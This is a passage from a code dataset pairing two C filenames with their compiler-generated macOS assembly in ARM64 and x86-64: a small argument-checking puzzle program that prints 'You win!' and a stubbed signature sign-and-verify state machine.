the_stack_data/872171.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] bl _megaInit ldur w8, [x29, #-8] subs w8, w8, #2 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: mov x9, sp mov x8, #1 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w0, #-1 bl _exit LBB0_2: b LBB0_3 LBB0_3: str wzr, [sp, #24] b LBB0_4 LBB0_4: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #24] subs w8, w8, #1 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_4 Depth=1 ldur x8, [x29, #-16] ldr w9, [sp, #24] add w9, w9, #1 ldr x0, [x8, w9, sxtw #3] mov x1, #0 mov w2, #10 bl _strtoul mov x8, x0 strh w8, [sp, #22] ldrh w8, [sp, #22] ldrsw x10, [sp, #24] sub x9, x29, #18 add x9, x9, x10, lsl #1 strh w8, [x9] ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB0_4 LBB0_6: sub x0, x29, #18 sub x1, x29, #20 bl _RandomFunc ldurh w8, [x29, #-20] mov w9, #12952 subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_9 LBB0_8: b LBB0_9 LBB0_9: str wzr, [sp, #16] b LBB0_10 LBB0_10: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] subs w8, w8, #1 cset w8, ge tbnz w8, #0, LBB0_12 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_10 Depth=1 ldrsw x9, [sp, #16] sub x8, x29, #20 ldrh w10, [x8, x9, lsl #1] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB0_10 LBB0_12: ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _megaInit ; -- Begin function megaInit .p2align 2 _megaInit: ; @megaInit .cfi_startproc ; %bb.0: ret .cfi_endproc ; -- End function .globl _RandomFunc ; -- Begin function RandomFunc .p2align 2 _RandomFunc: ; @RandomFunc .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] str x1, [sp, #16] ldr x8, [sp, #24] ldrh w8, [x8] add w8, w8, #2885 strh w8, [sp, #14] strh wzr, [sp, #12] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldrh w8, [sp, #12] ldr x9, [sp, #24] ldrh w9, [x9, #2] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_7 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldrh w8, [sp, #14] ldrh w9, [sp, #12] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB2_4 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_1 Depth=1 ldrh w8, [sp, #14] ldrh w9, [sp, #12] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_6 b LBB2_5 LBB2_5: ; in Loop: Header=BB2_1 Depth=1 ldrh w8, [sp, #12] mov x9, x8 add x8, sp, #14 ldrh w10, [x8, x9, lsl #1] ldrh w9, [sp, #12] ; kill: def $x9 killed $w9 add x9, x8, x9, lsl #1 ldrh w8, [x9] add w8, w8, w10 strh w8, [x9] b LBB2_6 LBB2_6: ; in Loop: Header=BB2_1 Depth=1 ldrh w8, [sp, #12] ; kill: def $x8 killed $w8 add x8, x8, #2 ; kill: def $w8 killed $w8 killed $x8 strh w8, [sp, #12] b LBB2_1 LBB2_7: ldrh w8, [sp, #14] mov w9, #37300 mul w8, w8, w9 ldr x9, [sp, #16] strh w8, [x9] add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Call this program with %i arguments\n" l_.str.1: ; @.str.1 .asciz "You win!\n" l_.str.2: ; @.str.2 .asciz "%u\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) callq _megaInit cmpl $2, -8(%rbp) je LBB0_2 ## %bb.1: leaq L_.str(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax movl $1, %esi callq _printf movl $-1, %edi callq _exit LBB0_2: jmp LBB0_3 LBB0_3: movl $0, -24(%rbp) LBB0_4: ## =>This Inner Loop Header: Depth=1 cmpl $1, -24(%rbp) jge LBB0_6 ## %bb.5: ## in Loop: Header=BB0_4 Depth=1 movq -16(%rbp), %rax movl -24(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx movq (%rax,%rcx,8), %rdi xorl %eax, %eax movl %eax, %esi movl $10, %edx callq _strtoul ## kill: def $ax killed $ax killed $rax movw %ax, -26(%rbp) movw -26(%rbp), %cx movslq -24(%rbp), %rax movw %cx, -18(%rbp,%rax,2) movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB0_4 LBB0_6: leaq -18(%rbp), %rdi leaq -20(%rbp), %rsi callq _RandomFunc movzwl -20(%rbp), %eax cmpl $12952, %eax ## imm = 0x3298 jne LBB0_8 ## %bb.7: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf jmp LBB0_9 LBB0_8: jmp LBB0_9 LBB0_9: movl $0, -32(%rbp) LBB0_10: ## =>This Inner Loop Header: Depth=1 cmpl $1, -32(%rbp) jge LBB0_12 ## %bb.11: ## in Loop: Header=BB0_10 Depth=1 movslq -32(%rbp), %rax movzwl -20(%rbp,%rax,2), %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl -32(%rbp), %eax addl $1, %eax movl %eax, -32(%rbp) jmp LBB0_10 LBB0_12: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _megaInit ## -- Begin function megaInit .p2align 4, 0x90 _megaInit: ## @megaInit .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp popq %rbp retq .cfi_endproc ## -- End function .globl _RandomFunc ## -- Begin function RandomFunc .p2align 4, 0x90 _RandomFunc: ## @RandomFunc .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rax movzwl (%rax), %eax addl $2885, %eax ## imm = 0xB45 ## kill: def $ax killed $ax killed $eax movw %ax, -18(%rbp) movw $0, -20(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 movzwl -20(%rbp), %eax movq -8(%rbp), %rcx movzwl 2(%rcx), %ecx cmpl %ecx, %eax jge LBB2_7 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movzwl -18(%rbp), %eax movzwl -20(%rbp), %ecx cmpl %ecx, %eax jle LBB2_4 ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_4 LBB2_4: ## in Loop: Header=BB2_1 Depth=1 movzwl -18(%rbp), %eax movzwl -20(%rbp), %ecx cmpl %ecx, %eax jne LBB2_6 ## %bb.5: ## in Loop: Header=BB2_1 Depth=1 movzwl -20(%rbp), %eax ## kill: def $rax killed $eax movzwl -18(%rbp,%rax,2), %edx movzwl -20(%rbp), %eax ## kill: def $rax killed $eax movzwl -18(%rbp,%rax,2), %ecx addl %edx, %ecx ## kill: def $cx killed $cx killed $ecx movw %cx, -18(%rbp,%rax,2) LBB2_6: ## in Loop: Header=BB2_1 Depth=1 movzwl -20(%rbp), %eax ## kill: def $rax killed $eax addq $2, %rax ## kill: def $ax killed $ax killed $rax movw %ax, -20(%rbp) jmp LBB2_1 LBB2_7: movzwl -18(%rbp), %eax imull $37300, %eax, %eax ## imm = 0x91B4 movw %ax, %cx movq -16(%rbp), %rax movw %cx, (%rax) popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Call this program with %i arguments\n" L_.str.1: ## @.str.1 .asciz "You win!\n" L_.str.2: ## @.str.2 .asciz "%u\n" .subsections_via_symbols
the_stack_data/43886598.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _engineInitVerify ; -- Begin function engineInitVerify .p2align 2 _engineInitVerify: ; @engineInitVerify .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _engineInitSign ; -- Begin function engineInitSign .p2align 2 _engineInitSign: ; @engineInitSign .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _engineUpdate ; -- Begin function engineUpdate .p2align 2 _engineUpdate: ; @engineUpdate .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 strb w0, [sp, #15] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _engineSign ; -- Begin function engineSign .p2align 2 _engineSign: ; @engineSign .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov x0, #10 mov x1, #1 bl _calloc str x0, [sp, #8] ldr x0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _engineVerify ; -- Begin function engineVerify .p2align 2 _engineVerify: ; @engineVerify .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] mov w0, #1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _invariant ; -- Begin function invariant .p2align 2 _invariant: ; @invariant .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 adrp x8, _S_state@GOTPAGE ldr x8, [x8, _S_state@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill ldr w8, [x8] adrp x9, _UNINITIALIZED@PAGE ldr w9, [x9, _UNINITIALIZED@PAGEOFF] subs w8, w8, w9 cset w8, eq mov w9, #1 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB5_3 b LBB5_1 LBB5_1: ldr x8, [sp] ; 8-byte Folded Reload ldr w8, [x8] adrp x9, _SIGN@PAGE ldr w9, [x9, _SIGN@PAGEOFF] subs w8, w8, w9 cset w8, eq mov w9, #1 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB5_3 b LBB5_2 LBB5_2: ldr x8, [sp] ; 8-byte Folded Reload ldr w8, [x8] adrp x9, _VERIFY@PAGE ldr w9, [x9, _VERIFY@PAGEOFF] subs w8, w8, w9 cset w8, eq str w8, [sp, #12] ; 4-byte Folded Spill b LBB5_3 LBB5_3: ldr w8, [sp, #12] ; 4-byte Folded Reload and w0, w8, #0x1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _sys_pre_Signature ; -- Begin function sys_pre_Signature .p2align 2 _sys_pre_Signature: ; @sys_pre_Signature .cfi_startproc ; %bb.0: mov w0, #1 ret .cfi_endproc ; -- End function .globl _par_pre_Signature ; -- Begin function par_pre_Signature .p2align 2 _par_pre_Signature: ; @par_pre_Signature .cfi_startproc ; %bb.0: mov w0, #1 ret .cfi_endproc ; -- End function .globl _Signature ; -- Begin function Signature .p2align 2 _Signature: ; @Signature .cfi_startproc ; %bb.0: adrp x8, _UNINITIALIZED@PAGE ldr w8, [x8, _UNINITIALIZED@PAGEOFF] adrp x9, _S_state@GOTPAGE ldr x9, [x9, _S_state@GOTPAGEOFF] str w8, [x9] ret .cfi_endproc ; -- End function .globl _sys_pre_initVerify ; -- Begin function sys_pre_initVerify .p2align 2 _sys_pre_initVerify: ; @sys_pre_initVerify .cfi_startproc ; %bb.0: mov w0, #1 ret .cfi_endproc ; -- End function .globl _par_pre_initVerify ; -- Begin function par_pre_initVerify .p2align 2 _par_pre_initVerify: ; @par_pre_initVerify .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] mov w0, #1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _initVerify ; -- Begin function initVerify .p2align 2 _initVerify: ; @initVerify .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] ldur w0, [x29, #-4] bl _engineInitVerify adrp x8, _VERIFY@PAGE ldr w8, [x8, _VERIFY@PAGEOFF] adrp x9, _S_state@GOTPAGE ldr x9, [x9, _S_state@GOTPAGEOFF] str w8, [x9] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _sys_pre_initSign ; -- Begin function sys_pre_initSign .p2align 2 _sys_pre_initSign: ; @sys_pre_initSign .cfi_startproc ; %bb.0: mov w0, #1 ret .cfi_endproc ; -- End function .globl _par_pre_initSign ; -- Begin function par_pre_initSign .p2align 2 _par_pre_initSign: ; @par_pre_initSign .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] mov w0, #1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _initSign ; -- Begin function initSign .p2align 2 _initSign: ; @initSign .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] ldur w0, [x29, #-4] bl _engineInitSign adrp x8, _SIGN@PAGE ldr w8, [x8, _SIGN@PAGEOFF] adrp x9, _S_state@GOTPAGE ldr x9, [x9, _S_state@GOTPAGEOFF] str w8, [x9] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _sys_pre_sign ; -- Begin function sys_pre_sign .p2align 2 _sys_pre_sign: ; @sys_pre_sign .cfi_startproc ; %bb.0: adrp x8, _S_state@GOTPAGE ldr x8, [x8, _S_state@GOTPAGEOFF] ldr w8, [x8] adrp x9, _SIGN@PAGE ldr w9, [x9, _SIGN@PAGEOFF] subs w8, w8, w9 cset w8, eq and w0, w8, #0x1 ret .cfi_endproc ; -- End function .globl _par_pre_sign ; -- Begin function par_pre_sign .p2align 2 _par_pre_sign: ; @par_pre_sign .cfi_startproc ; %bb.0: mov w0, #1 ret .cfi_endproc ; -- End function .globl _sign ; -- Begin function sign .p2align 2 _sign: ; @sign .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 bl _engineSign ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _sys_pre_verify ; -- Begin function sys_pre_verify .p2align 2 _sys_pre_verify: ; @sys_pre_verify .cfi_startproc ; %bb.0: adrp x8, _S_state@GOTPAGE ldr x8, [x8, _S_state@GOTPAGEOFF] ldr w8, [x8] adrp x9, _VERIFY@PAGE ldr w9, [x9, _VERIFY@PAGEOFF] subs w8, w8, w9 cset w8, eq and w0, w8, #0x1 ret .cfi_endproc ; -- End function .globl _par_pre_verify ; -- Begin function par_pre_verify .p2align 2 _par_pre_verify: ; @par_pre_verify .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] mov w0, #1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _verify ; -- Begin function verify .p2align 2 _verify: ; @verify .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x0, [sp, #8] bl _engineVerify ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _sys_pre_update ; -- Begin function sys_pre_update .p2align 2 _sys_pre_update: ; @sys_pre_update .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 adrp x8, _S_state@GOTPAGE ldr x8, [x8, _S_state@GOTPAGEOFF] ldr w8, [x8] adrp x9, _VERIFY@PAGE ldr w9, [x9, _VERIFY@PAGEOFF] subs w8, w8, w9 cset w8, eq mov w9, #1 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB21_2 b LBB21_1 LBB21_1: adrp x8, _S_state@GOTPAGE ldr x8, [x8, _S_state@GOTPAGEOFF] ldr w8, [x8] adrp x9, _SIGN@PAGE ldr w9, [x9, _SIGN@PAGEOFF] subs w8, w8, w9 cset w8, eq str w8, [sp, #12] ; 4-byte Folded Spill b LBB21_2 LBB21_2: ldr w8, [sp, #12] ; 4-byte Folded Reload and w0, w8, #0x1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _par_pre_update ; -- Begin function par_pre_update .p2align 2 _par_pre_update: ; @par_pre_update .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 strb w0, [sp, #15] mov w0, #1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _update ; -- Begin function update .p2align 2 _update: ; @update .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 sturb w0, [x29, #-1] ldursb w0, [x29, #-1] bl _engineUpdate ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _UNINITIALIZED ; @UNINITIALIZED .zerofill __DATA,__common,_UNINITIALIZED,4,2 .section __DATA,__data .globl _SIGN ; @SIGN .p2align 2 _SIGN: .long 2 ; 0x2 .globl _VERIFY ; @VERIFY .p2align 2 _VERIFY: .long 3 ; 0x3 .comm _S_state,4,2 ; @S_state .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _engineInitVerify ## -- Begin function engineInitVerify .p2align 4, 0x90 _engineInitVerify: ## @engineInitVerify .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) popq %rbp retq .cfi_endproc ## -- End function .globl _engineInitSign ## -- Begin function engineInitSign .p2align 4, 0x90 _engineInitSign: ## @engineInitSign .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) popq %rbp retq .cfi_endproc ## -- End function .globl _engineUpdate ## -- Begin function engineUpdate .p2align 4, 0x90 _engineUpdate: ## @engineUpdate .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movb %dil, %al movb %al, -1(%rbp) popq %rbp retq .cfi_endproc ## -- End function .globl _engineSign ## -- Begin function engineSign .p2align 4, 0x90 _engineSign: ## @engineSign .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $10, %edi movl $1, %esi callq _calloc movq %rax, -8(%rbp) movq -8(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _engineVerify ## -- Begin function engineVerify .p2align 4, 0x90 _engineVerify: ## @engineVerify .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _invariant ## -- Begin function invariant .p2align 4, 0x90 _invariant: ## @invariant .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _S_state@GOTPCREL(%rip), %rax movl (%rax), %ecx movb $1, %al cmpl _UNINITIALIZED(%rip), %ecx movb %al, -1(%rbp) ## 1-byte Spill je LBB5_3 ## %bb.1: movq _S_state@GOTPCREL(%rip), %rax movl (%rax), %ecx movb $1, %al cmpl _SIGN(%rip), %ecx movb %al, -1(%rbp) ## 1-byte Spill je LBB5_3 ## %bb.2: movq _S_state@GOTPCREL(%rip), %rax movl (%rax), %eax cmpl _VERIFY(%rip), %eax sete %al movb %al, -1(%rbp) ## 1-byte Spill LBB5_3: movb -1(%rbp), %al ## 1-byte Reload andb $1, %al movzbl %al, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _sys_pre_Signature ## -- Begin function sys_pre_Signature .p2align 4, 0x90 _sys_pre_Signature: ## @sys_pre_Signature .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _par_pre_Signature ## -- Begin function par_pre_Signature .p2align 4, 0x90 _par_pre_Signature: ## @par_pre_Signature .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _Signature ## -- Begin function Signature .p2align 4, 0x90 _Signature: ## @Signature .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl _UNINITIALIZED(%rip), %ecx movq _S_state@GOTPCREL(%rip), %rax movl %ecx, (%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _sys_pre_initVerify ## -- Begin function sys_pre_initVerify .p2align 4, 0x90 _sys_pre_initVerify: ## @sys_pre_initVerify .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _par_pre_initVerify ## -- Begin function par_pre_initVerify .p2align 4, 0x90 _par_pre_initVerify: ## @par_pre_initVerify .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _initVerify ## -- Begin function initVerify .p2align 4, 0x90 _initVerify: ## @initVerify .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl -4(%rbp), %edi callq _engineInitVerify movl _VERIFY(%rip), %ecx movq _S_state@GOTPCREL(%rip), %rax movl %ecx, (%rax) addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _sys_pre_initSign ## -- Begin function sys_pre_initSign .p2align 4, 0x90 _sys_pre_initSign: ## @sys_pre_initSign .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _par_pre_initSign ## -- Begin function par_pre_initSign .p2align 4, 0x90 _par_pre_initSign: ## @par_pre_initSign .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _initSign ## -- Begin function initSign .p2align 4, 0x90 _initSign: ## @initSign .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl -4(%rbp), %edi callq _engineInitSign movl _SIGN(%rip), %ecx movq _S_state@GOTPCREL(%rip), %rax movl %ecx, (%rax) addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _sys_pre_sign ## -- Begin function sys_pre_sign .p2align 4, 0x90 _sys_pre_sign: ## @sys_pre_sign .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _S_state@GOTPCREL(%rip), %rax movl (%rax), %eax cmpl _SIGN(%rip), %eax sete %al andb $1, %al movzbl %al, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _par_pre_sign ## -- Begin function par_pre_sign .p2align 4, 0x90 _par_pre_sign: ## @par_pre_sign .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _sign ## -- Begin function sign .p2align 4, 0x90 _sign: ## @sign .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp callq _engineSign popq %rbp retq .cfi_endproc ## -- End function .globl _sys_pre_verify ## -- Begin function sys_pre_verify .p2align 4, 0x90 _sys_pre_verify: ## @sys_pre_verify .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _S_state@GOTPCREL(%rip), %rax movl (%rax), %eax cmpl _VERIFY(%rip), %eax sete %al andb $1, %al movzbl %al, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _par_pre_verify ## -- Begin function par_pre_verify .p2align 4, 0x90 _par_pre_verify: ## @par_pre_verify .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _verify ## -- Begin function verify .p2align 4, 0x90 _verify: ## @verify .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rdi callq _engineVerify addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _sys_pre_update ## -- Begin function sys_pre_update .p2align 4, 0x90 _sys_pre_update: ## @sys_pre_update .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _S_state@GOTPCREL(%rip), %rax movl (%rax), %ecx movb $1, %al cmpl _VERIFY(%rip), %ecx movb %al, -1(%rbp) ## 1-byte Spill je LBB21_2 ## %bb.1: movq _S_state@GOTPCREL(%rip), %rax movl (%rax), %eax cmpl _SIGN(%rip), %eax sete %al movb %al, -1(%rbp) ## 1-byte Spill LBB21_2: movb -1(%rbp), %al ## 1-byte Reload andb $1, %al movzbl %al, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _par_pre_update ## -- Begin function par_pre_update .p2align 4, 0x90 _par_pre_update: ## @par_pre_update .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movb %dil, %al movb %al, -1(%rbp) movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _update ## -- Begin function update .p2align 4, 0x90 _update: ## @update .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movb %dil, %al movb %al, -1(%rbp) movsbl -1(%rbp), %edi callq _engineUpdate addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _UNINITIALIZED ## @UNINITIALIZED .zerofill 